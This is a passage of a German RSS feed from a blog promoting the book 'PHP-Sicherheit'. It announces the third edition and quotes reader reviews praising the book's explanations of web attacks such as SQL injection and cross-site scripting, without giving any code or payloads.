    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/23-guid.html</guid>
    
</item>
<item>
    <title>Dritte Auflage in Arbeit</title>
    <link>http://www.php-sicherheit.de/archives/17-Dritte-Auflage-in-Arbeit.html</link>
            <category>Buch</category>
    
    <comments>http://www.php-sicherheit.de/archives/17-Dritte-Auflage-in-Arbeit.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=17</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=17</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    Die dritte Auflage unseres Buches ist nun in Arbeit. Momentan bin ich dabei, die vom Fachlektorat angemerkten Korrekturen einzupflegen, danach geht das Buch ins Layout und dann hoffentlich ohne weitere Verzögerung in den Druck. &lt;br /&gt;
Es handelt sich bei der dritten - anders als der zweiten Auflage - nicht um eine inhaltlich wesentlich erweiterte Version, sondern um eine Korrekturauflage. Da die zweite Auflage praktisch ausverkauft ist (der Verlag hat keine Exemplare mehr, in Buchhandlungen bzw. online sind noch Reste verfügbar), muß in Bälde neu aufgelegt werden. Gestern kam nun der neue dpunkt-Verlagskatalog mit der Ankündigung der dritten Auflage hinzu.&lt;br /&gt;
Neben den üblichen Typofixes und Errata (vielen Dank an dieser Stelle an alle Einsender!) haben wir das Kapitel über Suhosin/Hardened PHP nochmals überarbeitet, das Kapitel zu Authentifizierung/Autorisierung inhaltlich etwas geradegezogen (u.a. auch mit einer kurzen Einführung der Begriffe Authentisierung, Authentifizierung, Autorisierung) und an anderen Stellen Aktualisierungen eingepflegt.&lt;br /&gt;
Alle Besitzer der zweiten Auflage sollten zumindest einen Blick hineinwerfen, für die Käufer der ersten Auflage unseres Buches bietet sich ein Kauf aber langsam an - denn zusammen mit den in die zweite Auflage eingeflossenen Änderungen hat sich doch deutlich was getan...&lt;br /&gt;
Für die vierte Auflage planen wir neue Inhalte, aber auch Anpassungen an das dann hoffentlich verfügbare PHP 6. Wer noch Anregungen für uns hat, was wir besser machen können oder wozu wir mal etwas schreiben könnten - immer her damit! 
    </content:encoded>

    <pubDate>Tue, 08 Apr 2008 09:09:33 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/17-guid.html</guid>
    
</item>
<item>
    <title>Neue Lesermeinung auf amazon.de</title>
    <link>http://www.php-sicherheit.de/archives/13-Neue-Lesermeinung-auf-amazon.de.html</link>
            <category>Reviews</category>
    
    <comments>http://www.php-sicherheit.de/archives/13-Neue-Lesermeinung-auf-amazon.de.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=13</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=13</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    Lars H. Korte schreibt:&lt;br /&gt;
&lt;blockquote&gt;Das Buch sollte mir einen kleinen Einblick in die Welt der PHP-Sicherheit geben. Ich war neugierig, was es für Möglichkeiten gibt, in PHP-Anwendungen einzubrechen und wie ich meine Anwendungen gegen &quot;böse Buben und Mädels&quot; schützen kann.&lt;br /&gt;
&lt;br /&gt;
Ich muss sagen, dass ich bei weitem nicht gedacht hätte, wie viele Angriffsmöglichkeiten und Schwachstellen es heutzutage geben kann (Session Fixation, Cross-Site Request Forgery, SQL-Injection, uvm.). Das Buch hat mir sehr geholfen, meinen Horizont in dieser Hinsicht zu erweitern.&lt;br /&gt;
&lt;br /&gt;
Es werden eine Menge Angriffsmöglichkeiten erklärt und ein möglicher Schutz dagegen erläutert. Bei einigen Angriffsarten waren mir die Gedankengänge der Autoren ab und zu leider etwas zu abstrus bzw. zu theoretisch erklärt und nur schwer nachvollziehbar. Bei einigen Angriffen wurde gezeigt, welchen Code man braucht, um zu &quot;hacken&quot; und bei anderen wurde leider nur theoretisch beschrieben, wie &quot;Schadcode&quot; eingeschleust werden kann. Hier hätte ich gerne auch noch ein handfestes Praxis-Beispiel gesehen, da in mir leider nicht so viel kriminelle Energie schlummert, als dass ich mir sowas selbst ausdenken könnte &lt;img src=&quot;http://www.php-sicherheit.de/templates/default/img/emoticons/smile.png&quot; alt=&quot;:-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
Die Anschaffung des Buches hat für mich zu 100% gelohnt und ich kann es ohne schlechtes Gewissen wärmstens weiterempfehlen!&lt;/blockquote&gt; 
    </content:encoded>

    <pubDate>Fri, 19 Oct 2007 14:30:11 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/13-guid.html</guid>
    
</item>
<item>
    <title>Neues Leserfeedback</title>
    <link>http://www.php-sicherheit.de/archives/12-Neues-Leserfeedback.html</link>
            <category>Reviews</category>
    
    <comments>http://www.php-sicherheit.de/archives/12-Neues-Leserfeedback.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=12</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=12</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    Thorsten Wisser schreibt: &lt;br /&gt;
&lt;blockquote&gt;Übrigens: großes Lob an Euch, ist ein super Buch, habe die 1. Auflage.&lt;br /&gt;
Hat mir sehr geholfen!!!&lt;/blockquote&gt; 
    </content:encoded>

    <pubDate>Fri, 19 Oct 2007 13:56:31 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/12-guid.html</guid>
    
</item>
<item>
    <title>Erste Rezension zur zweiten Auflage</title>
    <link>http://www.php-sicherheit.de/archives/10-Erste-Rezension-zur-zweiten-Auflage.html</link>
            <category>Reviews</category>
    
    <comments>http://www.php-sicherheit.de/archives/10-Erste-Rezension-zur-zweiten-Auflage.html#comments</comments>
    <wfw:comment>http://www.php-sicherheit.de/wfwcomment.php?cid=10</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.php-sicherheit.de/rss.php?version=2.0&amp;type=comments&amp;cid=10</wfw:commentRss>
    

    <author>nospam@example.com (Christopher Kunz)</author>
    <content:encoded>
    Von &lt;a href=&quot;http://seo-mobile.de/&quot;&gt;Pelle Boese&lt;/a&gt; kommt die erste Rezension zur Zweiten Auflage unseres Buches - vielen Dank für die freundlichen Worte! &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;Die aktualisierte zweite Auflage des Buches von Christopher Kunz und Peter Prochaska, die über 50 Seiten mehr als die erste Auflage bietet, ist eine lohnende - in meinen Augen sogar dringend notwendige - Anschaffung für PHP Entwickler und Systemadministratoren, aber auch für Entwickler die mit anderen Sprachen im Web-Bereich arbeiten. Besonders die Kapitel über Parametermanipulation, Cross-Site-Scripting und SQL-Injections sind, bis auf die Beispiele in PHP, sprachübergreifend.&lt;br /&gt;
[...]&lt;br /&gt;
Meiner Meinung nach ist dieses Buch die Referenz im PHP-Security-Bereich. Die vollständige Übersicht über mögliche Attacken und Präventionsmöglichkeiten gibt es - meines Erachtens nach - nirgends sonst in einem Buch vereint. Ein Must-Have, auch für stolze Besitzer der ersten Auflage.&lt;br /&gt;
&lt;/blockquote&gt;&lt;br /&gt;
Die vollständige Rezension können Sie auf &lt;a href=&quot;http://www.amazon.de/gp/product/3898644502?ie=UTF8&amp;amp;tag=asin0876cx789-21&amp;amp;linkCode=as2&amp;amp;camp=1638&amp;amp;creative=6742&amp;amp;creativeASIN=3898644502&quot;&gt;amazon.de&lt;/a&gt; nachlesen. 
    </content:encoded>

    <pubDate>Wed, 25 Apr 2007 23:29:30 +0200</pubDate>
    <guid isPermaLink="false">http://www.php-sicherheit.de/archives/10-guid.html</guid>
    
</item>

</channel>
</rss>
